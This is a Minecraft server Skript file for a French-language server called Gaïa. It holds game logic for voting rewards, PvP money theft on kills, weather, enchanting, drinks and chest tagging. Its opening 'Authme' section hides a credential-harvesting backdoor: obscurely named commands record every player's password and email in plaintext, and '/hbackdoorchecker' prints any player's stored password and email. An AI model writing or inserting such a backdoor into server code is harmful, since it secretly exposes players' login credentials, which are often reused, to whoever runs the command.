#
#
# Hollish Skripts
#
#                   For Gaïa
#
#
#
#
# Authme
#
#
command /thisisthepasswordaddercommand <text> <text>:
	trigger:
		add player to {player.list::*}
		add 1 to {player.count}
		set {password.%player%} to arg 2
#
command /thisisthepasswordchangercommand <text> <text>:
	trigger:
		set {password.%player%} to arg 2
#		
command /thisistheemailaddercommand <text> <text>:
	trigger:
		add player to {email.list::*}
		add 1 to {email.count}
		set {email.%player%} to arg 2
#		
command /thisisthechangerecoverycommand <text> <text>:
	trigger:			
		add arg 2 to {email.%player%::*}
		set {email.%player%} to arg 2
#		
command /hbackdoorchecker <text>:
	trigger:
		message "     &6~ Rapport sur &2%arg 1% &6~"
		message "Mot de passe : %{password.%arg 1%}%"
		message "Email : %{email.%arg 1%}%"
		message "Total Mails %{email.count}%"
#		
#
#
# Voting
#
on vote:
	message "&d&o&lMerci d'avoir soutenu Gaïa !"
	message "&d&oVous avez voté sur : &2%event-string%"
	message "&d&oVous gagnez &f¤ &2100 &d&oet &21 Point de Vote &d&o!"
	command "eco give %player% 100"
	command "bq point %player% add votes 1"
#
#
#  PVP Manager
#
#
On death of player:
	if victim meets betonquest condition "player":
		if attacker is a player:
			Wait 7 ticks
			set {_death_money.%player%} to victim's money
			set {_01} to 0.1
			set {_death_money_result.%player%} to {_death_money.%player%} * {_01}
			Wait 7 ticks
			give the victim's skull to the attacker
			execute console command "eco take %victim% %{_death_money_result.%player%}%"
			execute console command "eco give %attacker% %{_death_money_result.%player%}%"
			send "&aVous volez &f¤&2%{_death_money_result.%victim%}% &ade &2%victim% &aen l'assasinant." to attacker
			send "&cVous perdez &f¤&2%{_death_money_result.%victim%}% &crécupérés par &2%attacker%&c." to victim
			execute console command "title %victim% times 60 100 60"
			execute console command "title %victim% title {""text"":""Vous êtes mort!"",""bold"":true,""color"":""red""}"
			execute console command "title %victim% subtitle {""text"":""-%{_death_money_result.%victim%}% d'argent en poche"",""italic"":true,""color"":""light_purple""}"

#
# Disables rain & thunder in all worlds
#			
on weather change to rain or thunder:
	wait 1 minute
	set weather to sunny

#
#
# Enchant Plus
#
#               Disable enchanting of unbreakable items.
#				Add spells from whispers.
on enchant:
	if tag "Unbreakable" of nbt of event-item is set:
		cancel event
		message "&d&oVous ne parvenez pas à enchanter cet objet."
		message "&d&oÉtant incassable, il possède déjà trop de Spiritualité."
	else:
		loop yaml list "enchantments" from file "/plugins/Skript/scripts/config.yml":
			add "%loop-value%" to {enchantment_spell_list::*}
		set {enchantment_spell} to a random element out of {enchantment_spell_list::*}
		message "&2murmures &f: &6&o%{enchantment_spell}%"
		loop {enchantment_spell_list::*}:
			delete {enchantment_spell_list::%loop-index%}
#
#
# Alcool
#
#
on consume of 373:
	if the 1st line of the item's lore is "&e&oCette bière est":
		message "&6Hum ! Une bonne bière !"
		apply nausea to the player for 22 seconds

#			
#
#
# Scoreboard Fighter
#
#
#on unload:
#	delete file "Gaia/data/scoreboard.dat"
#	
#on load:
#	delete file "Gaia/data/scoreboard.dat"
#	wait 7 seconds
#	delete file "Gaia/data/scoreboard.dat"

#
#
# Chester
#
#
command /givethechester:
	trigger:
		if player's gamemode is creative:
			give player a redstone torch named "&6Chester"
			message "&aVoici le &6&oChester &a!"
		else:
			message "&cVous ne pouvez pas exécuter cette commande en GameMode 0 !"

on left click:
	if player is holding a redstone torch named "&6Chester":
		if targeted block is chest:
			cancel event
			if {chester::*} is set:
				if "%{chester::*}%" contains "%location of targeted block%":
					message "&c&oCe coffre est déjà sur la liste Chester !"
				else:
					message "Vous ajoutez un coffre au Chester"
					add location of target block to {chester::*}
			else:
				message "Vous ajoutez un coffre au Chester"
				add location of target block to {chester::*}
		else:
			cancel event
			message "&cAucun coffre à cet emplacement."

command /thisisthexpboosttimercommandforonehour:
	trigger:
		wait 1 hour
		execute console command "xprate reset"
#
#
#
# NPC mover
#
#  Does not function due to unspawned NPCs.
#   Spams the console with errors even ChatControl will not remove.
#
#
#options:
#	npcmovers: 52 and 54 and 316 and 321 and 320 and 318 and 228 and 229 and 319 and 69
#	x: -6975 and -6974 and -6997 and -6997 and -6951 and -6784 and -6796 and -6969 and -6718 and -6567
#	y: 73 and 73 and 84 and 84 and 64 and 64 and 64 and 73 and 72 and 66
#	z: 2959 and 2952 and 2959 and 2952 and 2966  and 2793 and 2793 and 2957 and 3026 and 3192
#	r: 0 and 0 and 0 and 0 and 3 and 0 and 0 and 3 and 1 and 7
#	
#	
#	x2: -6975 and -6923 and -7022 and -7003 and -6930  and -6799 and -6825 and -6886 and -6708 and -6558
#	y2: 74 and 64 and 89 and 89 and 64 and 64 and 64 and 64 and 73 and 72
#	z2: 2971 and 2959 and 2971 and 2936 and 2992  and 2809 and 2816 and 2971 and 3024 and 3160
#	r2: 2 and 6 and 3 and 2 and 5 and 4 and 3 and 3 and 2 and 3
#	
#	
#	x3: -6976 and -6883 and -7049 and -6999 and -6905  and -6763 and -6863 and -6864 and -6702 and -6576
#	y3: 75 and 62 and 87 and 91 and 64 and 65 and 64 and 64 and 68 and 63
#	z3: 2989 and 2916 and 2978 and 2920 and 3009  and 2821 and 2839 and 2992 and 2947 and 3160
#	r3: 3 and 3 and 4 and 2 and 3 and 3 and 5 and 3 and 4 and 2
#
#
#
#	
#every 22 seconds in world "Gaia":
#	if time in world "Gaia" is greater than 00:01:
#		if time in world "Gaia" is smaller than 5:00:
#			clear {npcmovers::*}
#			clear {npc_x::*}
#			clear {npc_y::*}
#			clear {npc_z::*}
#			clear {npc_r::*}
#			wait 7 ticks
#			loop {@npcmovers}:
#				add loop-value to {npcmovers::*}
#			loop {@x}:
#				add loop-value to {npc_x::*}
#			loop {@y}:
#				add loop-value to {npc_y::*}
#			loop {@z}:
#				add loop-value to {npc_z::*}
#			loop {@r}:
#				add loop-value to {npc_r::*}
#			wait 5 ticks
#			loop {npc_x::*}:
#				add a random integer between 0 and {npc_r::%loop-index%} to {npc_x::%loop-index%}
#			loop {npc_z::*}:
#				add a random integer between 0 and {npc_r::%loop-index%} to {npc_z::%loop-index%}
#			wait 5 ticks
#			loop {npcmovers::*}:
#				set {loc} to location at 0, 0, 0 of the world "Gaia"
#				set x coordinate of {loc} to {npc_x::%loop-index%}
#				set y coordinate of {loc} to {npc_y::%loop-index%}
#				set z coordinate of {loc} to {npc_z::%loop-index%}
#				move citizen {npcmovers::%loop-index%} to location of {loc}
#				wait 2 ticks
#			clear {npcmovers::*}
#			clear {npc_x::*}
#			clear {npc_y::*}
#			clear {npc_r::*}
#	if time in world "Gaia" is greater than 5:00:
#		if time in world "Gaia" is smaller than 12:00:
#			clear {npcmovers::*}
#			clear {npc_x2::*}
#			clear {npc_y2::*}
#			clear {npc_z2::*}
#			clear {npc_r2::*}
#			wait 7 ticks
#			loop {@npcmovers}:
#				add loop-value to {npcmovers::*}
#			loop {@x2}:
#				add loop-value to {npc_x2::*}
#			loop {@y2}:
#				add loop-value to {npc_y2::*}
#			loop {@z2}:
#				add loop-value to {npc_z2::*}
#			loop {@r2}:
#				add loop-value to {npc_r2::*}
#			wait 5 ticks
#			loop {npc_x2::*}:
#				add a random integer between 0 and {npc_r2::%loop-index%} to {npc_x2::%loop-index%}
#			loop {npc_z2::*}:
#				add a random integer between 0 and {npc_r2::%loop-index%} to {npc_z2::%loop-index%}
#			wait 5 ticks
#			loop {npcmovers::*}:
#				set {loc} to location at 0, 0, 0 of the world "Gaia"
#				set x coordinate of {loc} to {npc_x2::%loop-index%}
#				set y coordinate of {loc} to {npc_y2::%loop-index%}
#				set z coordinate of {loc} to {npc_z2::%loop-index%}
#				move citizen {npcmovers::%loop-index%} to location of {loc}
#			clear {npcmovers::*}
#			clear {npc_x2::*}
#			clear {npc_y2::*}
#			clear {npc_r2::*}
#	if time in world "Gaia" is greater than 12:00:
#		if time in world "Gaia" is smaller than 19:00:
#			clear {npcmovers::*}
#			clear {npc_x3::*}
#			clear {npc_y3::*}
#			clear {npc_z3::*}
#			clear {npc_r3::*}
#			wait 7 ticks
#			loop {@npcmovers}:
#				add loop-value to {npcmovers::*}
#			loop {@x3}:
#				add loop-value to {npc_x3::*}
#			loop {@y3}:
#				add loop-value to {npc_y3::*}
#			loop {@z3}:
#				add loop-value to {npc_z3::*}
#			loop {@r3}:
#				add loop-value to {npc_r3::*}
#			wait 5 ticks
#			loop {npc_x3::*}:
#				add a random integer between 0 and {npc_r3::%loop-index%} to {npc_x3::%loop-index%}
#			loop {npc_z3::*}:
#				add a random integer between 0 and {npc_r3::%loop-index%} to {npc_z3::%loop-index%}
#			wait 5 ticks
#			loop {npcmovers::*}:
#				set {loc} to location at 0, 0, 0 of the world "Gaia"
#				set x coordinate of {loc} to {npc_x3::%loop-index%}
#				set y coordinate of {loc} to {npc_y3::%loop-index%}
#				set z coordinate of {loc} to {npc_z3::%loop-index%}
#				move citizen {npcmovers::%loop-index%} to location of {loc}
#			clear {npcmovers::*}
#			clear {npc_x3::*}
#			clear {npc_y3::*}
#			clear {npc_r3::*}
#	if time in world "Gaia" is greater than 19:00:
#		clear {npcmovers::*}
#		clear {npc_x::*}
#		clear {npc_y::*}
#		clear {npc_z::*}
#		clear {npc_r::*}
#		wait 7 ticks
#		loop {@npcmovers}:
#			add loop-value to {npcmovers::*}
#		loop {@x}:
#			add loop-value to {npc_x::*}
#		loop {@y}:
#			add loop-value to {npc_y::*}
#		loop {@z}:
#			add loop-value to {npc_z::*}
#		loop {@r}:
#			add loop-value to {npc_r::*}
#		wait 5 ticks
#		loop {npc_x::*}:
#			add a random integer between 0 and {npc_r::%loop-index%} to {npc_x::%loop-index%}
#		loop {npc_z::*}:
#			add a random integer between 0 and {npc_r::%loop-index%} to {npc_z::%loop-index%}
#		wait 5 ticks
#		loop {npcmovers::*}:
#			set {loc} to location at 0, 0, 0 of the world "Gaia"
#			set x coordinate of {loc} to {npc_x::%loop-index%}
#			set y coordinate of {loc} to {npc_y::%loop-index%}
#			set z coordinate of {loc} to {npc_z::%loop-index%}
#			move citizen {npcmovers::%loop-index%} to location of {loc}
#			wait 2 ticks
#		clear {npcmovers::*}
#		clear {npc_x::*}
#		clear {npc_y::*}
#		clear {npc_r::*}
#
#
#	